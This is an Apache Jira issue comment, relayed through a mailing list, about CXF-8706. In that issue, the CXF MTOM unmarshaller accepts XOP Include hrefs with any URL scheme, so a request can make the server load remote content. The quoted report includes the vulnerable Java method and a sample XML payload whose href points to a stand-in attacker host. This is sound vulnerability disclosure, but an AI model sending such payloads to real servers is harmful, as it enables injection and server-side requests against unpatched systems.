[jira] [Commented] (CXF-8706) CXF MTOM handler allow content injection

Mon, 19 Dec 2022 04:36:05 -0800 


    [ 
https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17649304#comment-17649304
 ] 

Stefan Berger commented on CXF-8706:
------------------------------------

I don't think this is limited to MTOM enabled only.

I can send MTOM requests to my server with an Endpoint where 
{{SOAPBinding.isMTOMEnabled()}} returns false.

Is it possible that {{.isMTOMEnabled() == false}} is ignored on the server 
side? Debugging breakpoints aren't triggered. Neither on startup, nor when an 
MTOM request is received.

> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled, 
> Unmarshaller allows XOP Include tag to have href attributes that allow any 
> protocols.  According to the W3C MTOM spec, only "cid:" should be allowed for 
> href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) 
> line: 554    
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49    
>     MTOMDecorator.startElement(TagName) line: 70    
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId, 
> Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4), 
> StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else {// should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>  
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload"; 
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to